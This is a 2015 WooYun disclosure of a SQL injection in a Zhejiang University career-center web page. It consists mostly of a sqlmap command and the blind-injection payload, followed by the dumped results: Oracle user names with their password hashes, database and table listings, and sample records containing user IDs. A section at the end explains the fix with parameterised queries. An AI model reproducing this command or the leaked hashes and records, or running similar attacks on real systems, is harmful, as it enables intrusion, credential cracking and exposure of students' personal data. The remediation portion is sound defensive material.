
Vulnerability summary

Defect ID: wooyun-2015-0154710

Title: SQL injection in a page of the Zhejiang University Career Guidance and Service Center (DBA privileges / 43 system administrator passwords leaked / 33 databases / 2.45 million ID records leaked / 920,000 log records leaked)

Vendor: Zhejiang University

Author: 路人甲

Submitted: 2015-11-22 10:40

Fix time: 2015-11-27 10:42

Published: 2015-11-27 10:42

Type: SQL injection

Severity: High

Self-assessed rank: 10

Status: handed over to a third-party partner organization (CCERT, the CERNET emergency response team) for handling

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-22: Details sent to the vendor; awaiting the vendor's response
2015-11-27: The vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

SQL injection in a page of the Zhejiang University Career Guidance and Service Center (DBA privileges / 43 system administrator passwords leaked / 33 databases / 2.45 million ID records leaked / 920,000 log records leaked)

Detailed description:

URL: http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE

python sqlmap.py -u "http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE" -p dwloginid --technique=B --random-agent --batch --current-user --is-dba --users --passwords -D EJOB -T WJDC_WJHDB -C DRNF,PLSX,STID,TXNR,WJID,XXID,YHID --dump --start 1 --stop 10


back-end DBMS: Oracle
Database: EJOB
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| WJDC_WJHDB | 2453668 |
| XT_ZDLOG | 923276 |


Proof of vulnerability:

---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'EJOB'
current user is DBA: True
database management system users [43]:
[*] ADMISSION
[*] ANONYMOUS
[*] BOOK985211
[*] BWCMIS
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DNT
[*] EJOB
[*] EXFSYS
[*] IRDP
[*] IRDP_SJTB
[*] KLGB
[*] KLGB_USER
[*] MDSYS
[*] MGMT_VIEW
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] RWSK
[*] RWSKDBA
[*] SEARCH
[*] SHARE1010
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XSTD
[*] ZABBIX
[*] ZD_GJJY
[*] ZDQK
[*] ZDWEB
[*] ZFMH
[*] ZFSMP
[*] ZJUPAS
[*] ZJUSEARCH
[*] ZUSS
[*] ZXGL
database management system users password hashes:
[*] ADMISSION [1]:
password hash: 9576C4AF4F314090
[*] ANONYMOUS [1]:
password hash: anonymous
[*] BOOK985211 [1]:
password hash: 35B32F7CB49869E1
[*] BWCMIS [1]:
password hash: 3C915384B5DE27C9
[*] CMS [1]:
password hash: 21888B15738276A5
[*] CTXSYS [1]:
password hash: 24ABAB8B06281B4C
[*] DBSNMP [1]:
password hash: E066D214D5421CCC
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
[*] DNT [1]:
password hash: B96A665A672DF17E
[*] EJOB [1]:
password hash: 184B5FD05A261CE4
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
[*] IRDP [1]:
password hash: 7B842C52ACD30787
[*] IRDP_SJTB [1]:
password hash: 3886DF4B6E7F52D3
[*] KLGB [1]:
password hash: 3E9571A6D1901919
[*] KLGB_USER [1]:
password hash: 3FCA1F5D76FD61D2
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
[*] MGMT_VIEW [1]:
password hash: 5449705B65AA80C1
[*] ORACLE_OCM [1]:
password hash: 5A2E026A9157958C
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
[*] RWSK [1]:
password hash: DD74726A0654D550
[*] RWSKDBA [1]:
password hash: 4E36415ED0B1F7AD
[*] SEARCH [1]:
password hash: 5E46E91399F31935
[*] SHARE1010 [1]:
password hash: C0BC1D5DB5A8A848
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
[*] SYS [1]:
password hash: 75800913E1B66343
[*] SYSMAN [1]:
password hash: 447B729161192C24
[*] SYSTEM [1]:
password hash: F60464F7C3324170
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
[*] XDB [1]:
password hash: 88D8364765FCE6AF
[*] XSTD [1]:
password hash: FA5A38495BE751EE
[*] ZABBIX [1]:
password hash: 917FF6AAC3AD8ABB
[*] ZD_GJJY [1]:
password hash: 62CCCD604CBEEB83
[*] ZDQK [1]:
password hash: EF4EF71B6469DF34
[*] ZDWEB [1]:
password hash: 9F41AAD997C24D7E
[*] ZFMH [1]:
password hash: AC679BFBC9727906
[*] ZFSMP [1]:
password hash: 4FBCB2BD281A6653
[*] ZJUPAS [1]:
password hash: 43886DBC3C13ED61
[*] ZJUSEARCH [1]:
password hash: 84F958A512659E2A
[*] ZUSS [1]:
password hash: B864134D33CB3A73
[*] ZXGL [1]:
password hash: E7737492D8EA1F8E
available databases [33]:
[*] ADMISSION
[*] BOOK985211
[*] BWCMIS
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DNT
[*] EJOB
[*] EXFSYS
[*] IRDP
[*] IRDP_SJTB
[*] KLGB
[*] KLGB_USER
[*] MDSYS
[*] ORDSYS
[*] OUTLN
[*] RWSK
[*] RWSKDBA
[*] SHARE1010
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZD_GJJY
[*] ZDQK
[*] ZDWEB
[*] ZFMH
[*] ZFSMP
[*] ZJUPAS
[*] ZUSS
[*] ZXGL
current schema (equivalent to database on Oracle): 'EJOB'
Database: EJOB
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| WJDC_WJHDB | 2453668 |
| XT_ZDLOG | 923276 |
| ZD_DA_XSDAQDB | 316790 |
| WJDC_WJDJRB | 303219 |
| ZD_SYXXB | 93367 |
| ZD_XYXXB | 86233 |
| ZD_SYXXB_TMP_TEST1 | 85246 |
| ZD_JYXXB | 82053 |
| ZD_BDZHB | 71392 |
| ZD_BDZHB_TMP_TEST1 | 59513 |
| ZD_BDXXB | 55306 |
| ZD_JYXGJLB | 52414 |
| ZD_DAXXB | 41727 |
| ZD_DAXXB_TMP_TEST1 | 41727 |
| ZD_SYXGJLB | 34733 |
| ZDWZ_ZPXXB | 29324 |
| ZDWZ_ZPHCDYDB | 25073 |
| ZDWZ_DWZPB | 21816 |
| WJDC_DJR_XSK | 21403 |
| ZD_DWXXB | 21140 |
| ZD_XYSHB | 20261 |
| ZD_BMQTXXB | 16885 |
| BAK_ZDWZ_ZPXXB | 16747 |
| ZDWZ_ZWTJB | 16719 |
| ZDWZ_DWZCB | 16419 |
| ZD_BMXXB | 15190 |
| ZXQY_QYXXB | 13573 |
| WJDC_DJR_XSK_TMP_TEST1 | 12103 |
| TEST_ZD_SYXXB | 11997 |
| ZD_BDZHB_TMP2_TEST1 | 11879 |
| ZD_BMGRXXB | 11620 |
| WJDC_DJR_XSK_TMP2_TEST1 | 10621 |
| ZD_TJXXB | 9478 |
| DMK_CODELIST | 9258 |
| ZD_MYXXB | 9231 |
| ZD_MYXXB_TMP_TEST1 | 8323 |
| WJDC_XYWJFSB | 8210 |
| ZD_XY_ZY | 8088 |
| XT_USERPURVIEW | 7844 |
| ZXQY_QYDWB | 7789 |
| ZDWZ_ZPHSQB | 6599 |
| YAN_ZD_SYXXB | 6554 |
| TEMP_ZD_SYXXB | 6234 |
| BEN_ZD_SYXXB | 6150 |
| ZD_SYXGSQB | 4924 |
| WJDC_STK_XXB | 4336 |
| WJDC_DJR_XYK | 4109 |
| JC_AREA_TEMP | 3839 |
| ZDWZ_ZCZPHXXB | 3700 |
| DMK_CODELIST_TMP2_TEST1 | 3524 |
| JC_AREA | 3491 |
| ZDWZ_CDSQB | 3274 |
| ZD_WYXXB | 2995 |
| DMK_XX | 2981 |
| WJDC_DJR_XYK_TMP2_TEST1 | 2854 |
| ZDWZ_ZCQTXXB | 2735 |
| DMK_CODELIST_TMP_TEST1 | 2450 |
| ZD_XYXXSZB | 2173 |
| TMP_DWXXB | 2148 |
| ZD_ZY | 2074 |
| ZD_ZY_TEST | 2002 |
| ZDWZ_CDSQB_BAK | 1769 |
| YW_STUINFOMODIFY | 1734 |
| YW_STUDENTINFO | 1732 |
| JC_ZHUANYE | 1537 |
| ZD_XYSH_NEW | 1493 |
| WJDC_WJXXXXB | 1461 |
| ZDWZ_ZPTMP | 1445 |
| ZD_TJB | 1389 |
| WJDC_DJR_XYK_TMP_TEST1 | 1257 |
| ZD_XYSH_OLD | 1129 |
| ZDWZ_CDSQSFXMB | 1095 |
| TEMP_MYXSB | 1032 |
| TEST_ZD_XY_ZY | 988 |
| JC_GVLIST | 967 |
| ZD_BMZDPZB | 930 |
| ZD_DAB | 881 |
| ZD_DAB_TMP_TEST1 | 875 |
| WJDC_STK | 838 |
| ZDWZ_CDSQSFXMB_BAK | 671 |
| ZD_SJSBB_JSH | 664 |
| ZD_SY_ZY | 662 |
| ZD_SYXXB_TMP2_TEST1 | 474 |
| TEST | 469 |
| BAK_SYSXXB | 393 |
| ZD_DWSSJTB | 373 |
| ZDWZ_ZWLB_MC | 373 |
| JC_CITY | 348 |
| ZDWZ_ZWMCB | 336 |
| XT_ROLETOMODEL | 302 |
| PRINTPAGE | 220 |
| XT_ADMINUSER | 215 |
| ZD_BMXMB | 196 |
| ZD_WJGLB | 171 |
| ZD_XYSYSB | 160 |
| ZDWZ_ZCLXRB | 160 |
| JC_SCHOOL | 137 |
| ZD_BDZGPYSB | 124 |
| XT_SUBMODEL | 87 |
| ZD_MYXXB_TMP2_TEST1 | 86 |
| JC_GVLISTTEMP | 76 |
| XT_SUBMODELTEMP | 74 |
| NEWSCONTENT | 69 |
| ZDWZ_ZPHXXB | 65 |
| ZDWZ_ZPHCDB | 59 |
| ZDWZ_CDSFXMGXB | 58 |
| WJDC_WJSTDLB | 57 |
| DMK_TYPELIST | 53 |
| TEST_ZD_JYXXB | 51 |
| ZD_DA_DAQDB | 51 |
| WJDC_JCDMK | 49 |
| ZDWZ_HYLBB | 46 |
| WJDC_WJJBXXB | 45 |
| ZD_DAXXB_TMP2_TEST1 | 45 |
| ZD_SJSBB | 43 |
| ZD_ZY_A | 42 |
| ZXQY_DWXZDMB | 40 |
| ZDWZ_ZWLBB | 38 |
| YW_CLASS | 36 |
| NEWS_TMP | 22 |
| XT_MODEL | 21 |
| YW_NEWS_COLUMN | 21 |
| ZD_YHDCZDB | 21 |
| JC_RESTYPE | 20 |
| ZDWZ_CDSFXMB | 20 |
| XT_ROLE | 18 |
| YW_STUINFOMODIFY_TEMP | 18 |
| YW_STUDENTINFO_TEMP | 14 |
| ZD_YHFKB | 14 |
| YW_STUDENTINFO_TMP_SYS | 13 |
| WJDC_WJLJB | 12 |
| ZD_ZNXWB | 11 |
| WJDC_STLXDMB | 9 |
| YW_COLLEGE_TEMP | 8 |
| YW_DATELIST | 8 |
| YW_SCHOOL_ZHUANYE | 8 |
| YW_AD | 7 |
| YW_CLASS_TEMP | 6 |
| YW_SCHOOL_ZHUANYE_TEMP | 6 |
| ZD_DAB_TMP2_TEST1 | 6 |
| ZD_YJMBB | 6 |
| ZD_YXYHB | 6 |
| WJDC_DZLJB | 5 |
| ZDWZ_CDYHQXB | 5 |
| JC_POSTTYPE | 4 |
| YW_AD_POSITION | 4 |
| YW_STUDENTINFOTEMP_TMP_XX | 4 |
| YW_STUJYJHBTMP | 4 |
| YW_WJDCB | 4 |
| YW_AD_PAGE | 3 |
| YW_STUDENTINFOTEMP_TEMP | 3 |
| JC_SCHOOLTEMP | 2 |
| JC_ZHUANYE_TEMP | 2 |
| JL_PRACTICE | 2 |
| YW_COLLEGE | 2 |
| YW_STUJYXG | 2 |
| YW_STUPLANMODIFY | 2 |
| YW_ZBMS | 2 |
| ZD_BDZYSCTJB | 2 |
| ZD_DCZDB | 2 |
| JL_MINORTRAINING | 1 |
| WJDC_CSSZB | 1 |
| XT_PARASETTING | 1 |
| YW_SJSZ | 1 |
| YW_STUJYJHB | 1 |
| YW_STUPLAN | 1 |
| YW_STUUSERINFO | 1 |
| ZD_CSSZB | 1 |
| ZD_SJSBB_CHECK | 1 |
| ZD_SYXXB_CHECK | 1 |
+---------------------------+---------+
Database: EJOB
Table: WJDC_WJHDB
[7 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| DRNF | VARCHAR2 |
| PLSX | VARCHAR2 |
| STID | VARCHAR2 |
| TXNR | VARCHAR2 |
| WJID | VARCHAR2 |
| XXID | VARCHAR2 |
| YHID | VARCHAR2 |
+--------+----------+
Database: EJOB
Table: WJDC_WJHDB
[10 entries]
+------+------+------+------+------+------+------------+
| DRNF | PLSX | STID | TXNR | WJID | XXID | YHID |
+------+------+------+------+------+------+------------+
| 2011 | 1 | 154 | NULL | 16 | 746 | 3070601193 |
| 2011 | 0 | 152 | NULL | 16 | 729 | 3070601193 |
| 2011 | 1 | 151 | NULL | 16 | 724 | 3070601193 |
| 2011 | 2 | 130 | NULL | 16 | 646 | 3070601193 |
| 2011 | 0 | 125 | NULL | 16 | 625 | 3070601193 |
| 2011 | 0 | 156 | NULL | 16 | 754 | 20808001 |
| 2011 | 0 | 152 | NULL | 16 | 731 | 3070902120 |
| 2011 | 0 | 151 | NULL | 16 | 721 | 3070301015 |
| 2011 | 1 | 152 | NULL | 16 | 735 | 20903051 |
| 2011 | 2 | 130 | NULL | 16 | 646 | 20903031 |
+------+------+------+------+------+------+------------+


Remediation:

Add input filtering.
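The remediation above says only to add filtering. The durable fix for this class of defect in a JSP/Oracle application is to bind the request parameter instead of concatenating it into the SQL text, so that no amount of quoting in dwloginid can change the statement. The following is an added example, not code from the report or from the affected system: it uses an in-memory SQLite table as a stand-in for the EJOB schema (the table and column names are assumptions; only the parameter name dwloginid comes from the report), implements the lookup both ways, and shows that the boolean-based blind payload shape recorded above only produces an observable true/false difference against the concatenated version.

```python
import sqlite3

# Constructed stand-in for the Oracle schema behind loginzphdwzpxx.do.
# The table and column names below are assumptions for this example; only
# the request parameter name (dwloginid) comes from the report.
EMPLOYERS = [
    ("acme_hr", "ACME Recruiting"),
    ("demo_lab", "Demo Research Institute"),
]


def make_db():
    """Create an in-memory SQLite database with a small constructed employer table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employer (dwloginid TEXT PRIMARY KEY, dwmc TEXT)")
    conn.executemany("INSERT INTO employer VALUES (?, ?)", EMPLOYERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, dwloginid):
    """Build the SQL text by concatenation, the pattern the report's payload exploits.

    Whatever the caller passes in dwloginid becomes part of the statement, so a
    quote character ends the literal and the remainder is parsed as SQL.
    """
    sql = "SELECT dwmc FROM employer WHERE dwloginid = '" + dwloginid + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, dwloginid):
    """Bind dwloginid as a parameter; the value can never alter the statement.

    In a JSP/JDBC application the equivalent is PreparedStatement.setString,
    which removes the need for string filtering on this query.
    """
    sql = "SELECT dwmc FROM employer WHERE dwloginid = ?"
    return [row[0] for row in conn.execute(sql, (dwloginid,))]


# The boolean-based blind payload shape from the report (true and false forms),
# appended to a legitimate id so the only thing that varies is the condition.
TRUE_PROBE = "acme_hr' AND 7520=7520 AND 'EFsN'='EFsN"
FALSE_PROBE = "acme_hr' AND 7520=7521 AND 'EFsN'='EFsN"


def compare(conn):
    """Return what each implementation answers for a normal id and the two probes.

    The vulnerable version answers differently for the true and the false probe,
    which is the one-bit oracle that sqlmap's boolean-based blind technique reads.
    The parameterised version treats both probes as an id that does not exist.
    """
    return {
        "vulnerable": {
            "normal": lookup_vulnerable(conn, "acme_hr"),
            "true_probe": lookup_vulnerable(conn, TRUE_PROBE),
            "false_probe": lookup_vulnerable(conn, FALSE_PROBE),
        },
        "safe": {
            "normal": lookup_safe(conn, "acme_hr"),
            "true_probe": lookup_safe(conn, TRUE_PROBE),
            "false_probe": lookup_safe(conn, FALSE_PROBE),
        },
    }


if __name__ == "__main__":
    for impl, results in compare(make_db()).items():
        for case, rows in results.items():
            print(f"{impl:10s} {case:12s} -> {rows}")
```

Running the block prints six lines: the concatenated lookup returns the employer row for both the normal id and the true probe and nothing for the false probe, while the bound lookup returns the row only for the normal id. Because the proof section shows the current user is a DBA, binding the parameter should be paired with running the EJOB schema under an account that holds only the privileges the application needs, which limits what any remaining injection point could reach.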

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact; vendor ignored

Ignored at: 2015-11-27 10:42

Vendor reply:

Latest status:

None yet